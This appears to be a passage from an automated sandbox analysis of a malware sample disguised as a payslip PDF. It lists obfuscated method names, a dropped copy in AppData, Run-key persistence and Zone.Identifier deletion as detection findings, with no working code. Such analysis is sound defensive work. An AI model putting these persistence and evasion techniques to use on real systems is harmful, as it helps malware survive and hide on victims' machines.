                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, NOQnugKbQgmf98fjro.csHigh entropy of concatenated method names: 'ldAgEKp0RX', 'NX3gUXy864', 'BoFfoeFJZp', 'fIsfmFvWPh', 'Y7jgDyJVIi', 'Ltog7cEvQx', 'c9MgeAlcX3', 'LingG3OAnW', 'avlgtjYdU9', 'ydOg2MCevt'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, HhRnp80YNIZjcH3iKc.csHigh entropy of concatenated method names: 'EHOpGrU3ov', 'lDJptlqCia', 'ryRp2IN35O', 'VFopXYGIIE', 'bAAp4IXtgV', 'Mh2pKYyP0y', 'hKOpH8nMXg', 'cmTpEQWvHY', 'g6XpO003fp', 'caIpU7iFg6'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, Gn7jTymF8Guf4n5v8c8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IHmhGF2M6i', 'DiuhtVDqwP', 'KPuh2yhjCw', 'qZ7hXwxGvV', 'gbwh4vF9ZZ', 'bXMhK7iiwU', 'i25hHCwbgg'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, ir7xw0dQgUU613gg97.csHigh entropy of concatenated method names: 'Jyiv3J51ig', 'BhUvxs3eTN', 'YU4v08Ilq6', 'j5BvdaiQRJ', 'SSBv6VWJrT', 'fkKvSEa5YB', 'GsevgmxuDV', 'wiQvfIkhKg', 'pnsvMOuMSm', 'pjMvhZgTql'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, NUh8tJG3dF1wRcPdyC.csHigh entropy of concatenated method names: 'S5y6cy7CyG', 'ACx67uvpWb', 'v6j6GL3RTR', 'Ios6tY1kE4', 'nto6leskns', 'e5N6AU36Ox', 'TLn6w1baHw', 'YZZ6uBkrQN', 'zEi6JeOOHu', 'bAw6NISg4w'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, dIqP5DOFjSuxjC5UrE.csHigh entropy of concatenated method names: 'apffLRurEj', 'G9qfl8EbyO', 'qFAfAPMaUG', 'y6DfwBRlKH', 'cZRfGQeGFd', 'V9rfuvem38', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, b7HwaCzHwTk3HmbbLI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'utqMYi602h', 'qhOM6AlAmY', 'L4PMSLKJjg', 'Yc3MgKbiU4', 'PUEMfMmReH', 'GcpMMA306Y', 'zUuMhTQOVQ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, nBTdErmm9l7KcE2fpCx.csHigh entropy of concatenated method names: 'ToString', 'FaShFoqk5Z', 'VXBhTffu2e', 'qg3h1XoH4D', 'foOhsBRg53', 'CoUhpI1Mnh', 'ySjhvs7glP', 'OXshP6jVuX', 'Bm368G6OfsnuqYT6G7X', 'bJDa9E60W2ybRNiKAPZ'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, Wj329MTPLq1QqODYbJ.csHigh entropy of concatenated method names: 'USlmIhRnp8', 'oNImBZjcH3', 'DQgmQUU613', 'pg9mi7UbeS', 'YIwm6aD1EU', 'GqamSTsaeI', 'zL1iPt2iEockm3kLrO', 'UA8nddJ0oEjcTZCnrg', 'nBMmmyjNDI', 'qYMmFm7XbX'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, YZs4uRpVZWp8IRtc8l.csHigh entropy of concatenated method names: 'Dispose', 'PxtmOrxEmo', 'kBualDUWZQ', 'pVKwwVfQx7', 'bJBmUPPT1W', 'Iw1mzmPWbm', 'ProcessDialogKey', 'sbTaoIqP5D', 'djSamuxjC5', 'YrEaaunbD2'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, MiCEWYmoJa161u2i4UQ.csHigh entropy of concatenated method names: 'F24MyLGFRk', 'TmOMWKbwfW', 'Jg1M8f7ETt', 'kRvM3wNDnF', 'tq2M5m3C9j', 'ANqMxTIxY5', 'y3uMZmM9WI', 'a7jM0ixOAa', 'yvtMd1l3QO', 'BoIMqmjaUR'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, KBPPT1EWww1mPWbmMb.csHigh entropy of concatenated method names: 'GcofsG1Esn', 'Yr1fp8JLxS', 'U6vfvYUKKX', 'hqafPdxlO6', 'XOdfjRQDN7', 'EKRfI4DKjE', 'trDfBhmEXy', 'FS0fCBtRJc', 'tSbfQVAq17', 'u5Cfi6o2Xw'
                    Source: 0.2.Payslip_October_2024_pdf.exe.77c0000.6.raw.unpack, TTWhxAnE79rwZHoEYw.csHigh entropy of concatenated method names: 'S8nIyGC0My', 'rieIWGJDJx', 'nOEI8TW8Fw', 'dw1I3UfvKo', 'mxnI5K7aZI', 'MQSIx6EWcy', 'BUJIZxjZLL', 'YngI0b0Nc4', 'OQCIdw7XYJ', 'dx9IqHRr9Z'
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
